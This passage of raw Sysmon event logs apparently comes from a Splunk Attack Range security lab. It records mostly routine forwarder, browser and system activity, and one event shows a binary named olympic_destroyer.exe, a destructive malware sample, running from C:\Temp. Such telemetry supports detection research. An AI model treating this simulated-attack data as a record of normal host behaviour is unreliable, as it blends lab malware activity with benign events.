Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:20.124{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA88122E0EA0AB3A9F33E8033584FD69,SHA256=926B7301CBBD7403F14BBCF3F3C02361C83090C2CD6FDAC816CCBEF0B84D2337,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220439Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:21.836{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB53F4D23DB98D720FB76677699F73B2,SHA256=B81757F00F4D3BCC4313AA1D142169762A71009A06B6AD2E72FAAC84656912AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:21.353{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1659-6216-FB06-000000003802}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:21.353{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:21.353{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:21.353{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:21.353{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:21.352{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1659-6216-FB06-000000003802}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:21.351{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1659-6216-FB06-000000003802}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:21.349{C8EA50B7-1659-6216-FB06-000000003802}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:21.153{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60AC78BA0716C098F374691163046E4C,SHA256=18D0335D12DFB9632C6020D70D138E7387C1B97F71F8A1F368009772B8249849,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220441Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:22.867{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C265E5947F25107144A09AE202FBD2D,SHA256=21BE717508F23F542D019374036F2ABBF82CBF4A2D2AEE11104E14F6330663F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:20.658{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49343-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:22.184{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D957DFCD4964DD165964640DB8686BBE,SHA256=84E4588D5610F8F51AF88F8EA7C8AC5F4C51A32E97BBF26473C0CF4929E68F3F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220440Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:19.661{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51583-false10.0.1.12-8000- 23542300x8000000000000000220442Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:23.977{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCAD5596F114D320870F6E24FC41E4A4,SHA256=CE3CC79227DF1F1BF8D0790648D7728ADF8BA96B2ADE412261579B62DC1889A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:23.187{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9920F50B5F570F05B3A81A70FCFD2B5,SHA256=D8956878D9D4EAA18E07A579C1D1D071E163FCFC1457B4A62C329D31EC7252C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220443Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:24.992{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FA6D1C2C1CB08C1F2033863BD2E63AC,SHA256=2B4F2EBFD788F638F54E135BABF58E91BCA7F881E7C9A36C9D5EA5AD09C3015C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:24.218{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=441B245226C67A9E4FF13E0398333609,SHA256=2EDE4049C962FD4101C9A8CCCC7A99944E7A039758975BEAAAE899CA263CB8FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:25.253{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA5161CB0764E5AA3DA1E6FDE45AE117,SHA256=95C5B0CFA5662D3406162F23274F6C683BF389D65E2F73A4AAC1BCA95917A9F1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:26.933{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:26.286{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70C0E343ECAF574DDF3FB1F29C15A475,SHA256=7D486C1CF427DF0F0AAD33D341F9A2204ADCC9354FD6359F7C0C1EC2CE945272,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220444Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:26.039{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7449DDC70D11C52E911483300154E83D,SHA256=E5A6D69F13CBE38506031DFA417A4E0594E4F49E4AD8A1BBA9601B00421860E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:26.001{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000296439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:25.986{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:25.986{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF919e13.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220446Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:25.661{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51584-false10.0.1.12-8000- 23542300x8000000000000000220445Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:27.055{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F6ED2C7A0CB77CCEB4A51DBDEE025D0,SHA256=F418E88B0114430EDFE710CFE4493EEB6410E972F383F4056D8191F543E66DA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:27.801{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=633ACF9862AE890DCD552F27DA324D2E,SHA256=88EFD97B2C35F89FC38F19B0BD512F0B1409D186B0D6F0E0233BE440E45EE17C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:27.801{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=0C8BB034BEC7123A1E274727DF2C9609,SHA256=C5A429E0177CE52B5A1A727C4D059CDE84516FEF71C940C7DAAFF78C4E7899E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:25.055{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49344-false34.117.237.239239.237.117.34.bc.googleusercontent.com443https 23542300x8000000000000000296444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:27.301{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03A47B7A8482C8DC32BE2AF6571C8B54,SHA256=051688AB2B5683607B0FFE5E0FB83561FD1A9E681F4AE9DA63E90F1B877128C1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:27.186{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220448Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:28.825{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-154MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220447Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:28.289{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F94A062E18C539FABE0CDF85579E526,SHA256=924957590B53A1BFEAD9823A7DD9F4E968E18C6F5448BD8C387700FDBA62A79F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:26.575{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49345-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:28.317{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1461667FBA5D5B7FA80B44E56C540370,SHA256=19B7320CBEA0249DA755D2714CBB6D28C44549277211D246EFF327A1A70241D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:29.351{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF025AFC64D33FFFA7F48DDD065301D4,SHA256=329B40B5D081B78FBED93476734DF3926A47D8ECCFBA275740D66958CEB5C9AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220450Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:29.838{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-155MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220449Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:29.368{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 